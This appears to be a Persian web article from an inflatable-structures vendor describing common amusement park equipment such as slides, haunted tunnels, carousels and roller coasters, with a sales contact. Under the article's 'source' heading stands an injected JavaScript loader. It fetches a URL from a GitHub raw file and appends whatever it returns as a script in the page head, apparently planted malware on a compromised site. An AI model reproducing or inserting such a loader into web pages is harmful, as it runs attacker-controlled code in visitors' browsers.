تجهیزات رایج در شهربازی
تجهیزات رایج در شهربازی

تجهیزات رایج در شهربازی

  • برای ایجاد یک طیف وسیع از تفریحات و سرگرمی‌ها و همچنین ایجاد احساسات مختلف برای افراد مراجعه کننده، معمولا اجزای شهربازی قسمت‌های مختلفی دارند.

    سرسره‌ها آبی بادی

    این سرسره‌ها یکی از بخش‌های اصلی شهربازی به حساب می‌آیند. معمولا این قسمت به صورت آبی و یا بدون آب می توان استفاده کرد. که به ابعاد مختلفی وجو دارد.تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه ها می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیری

    تونل‌های وحشت

    در پارک بازی برای ایجاد حس ترس و وحشت به شرکت کنندگان، معمولا تونل‌ها سرپوشیده و تو در تویی با عرض‌های کم ایجاد می‌شوند که در آن کاراکتر‌ها و عروسک‌های ترسناکی وجود دارند. این عروسک‌ها به صورت ناگهانی و غیر ناگهانی روی صحنه می‌آیند و باعث ترسیدن شرکت‌کنندگان می‌شوند.

    ماشین سواری شهربازی

    معمولا این بخش در پارک بازی های سرپوشیده وجود دارد. چندین ماشین‌های ساده با یک فرمان وجود دارند که روی یک سطح خاص توسط فرمان هدایت می‌شوند.

    غرفه‌ها و مغازه ها

    معمولا ما در هر شهربازی غرفه‌ها و مغازه هایی می‌بینیم که بخشی از آنها مواد غذایی و تنقلات می‌فروشند ولی بعضی دیگر در قبال دریافت هزینه ای، شما را به چالش می‌کشند و در صورت برنده شدن، می‌توانید از جوایزی که برای برندگان در نظر گرفته اند، بهره‌مند شوید.

    چرخ و فلک

    همانطور که بیشتر شما در پارک بازی این وسیله را می‌بینید، این وسیله بزرگ چرخ و فلک از نوع افقی آن می‌باشد. این نوع چرخ و فلک‌ها به صورت‌های گوناگون می‌باشند. معمولا چرخ و فلک‌ها صندلی هایی به شکل ساده یا اسب مانند دارند و افراد روی آن می‌نشینند تا چرخ و فلک به صورت عمودی از پایین به بالا برود و یک حرکت دایره‌ای انجام دهد.

    تاب پارک بازی

    از جمله وسایل دیگری که باعث جذابیت پارک بازی ها می‌باشد، تاب است. بگونه‌ای که چندین تاب از یک سقف گردان آویزان شده‌اند و این سقف شروع به حرکت می‌کند و تفریح‌کنندگان را در هوا می‌چرخاند.

    ترن هوایی

    ترن هوایی خط آهنی معمولا طولانی است که در قسمت هایی از مسیر خود دارای پیچ و انحراف با شیب کم و زیاد است. البته در ساخت این ترن‌ها باید بسیار دقت شود تا وسایل سواری روی ترن از رده خارج نشوند. ترن هوایی بیشتر در پارک بازی بکار می‌رود و از محبوب‌ترین تجهیزات سواری می‌باشد.

    دسته بندی وسایل شهربازی

    1. سازه ها بادی آبی
    2. بازی های گیمی video games
    3. دستگاه های جایزه گیری novolity games
    4. دستگاه های تیکتی redemption games
    5. دستگاه های رومیزی و اسپرت sport games
    6. دستگاه های واقعیت مجازی و شبیه ساز ها
    7. بازی های کودکان خردسال
    8. دستگاه های مکانیکی شهربازی
    9. Attraction games or rides

    منبع

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید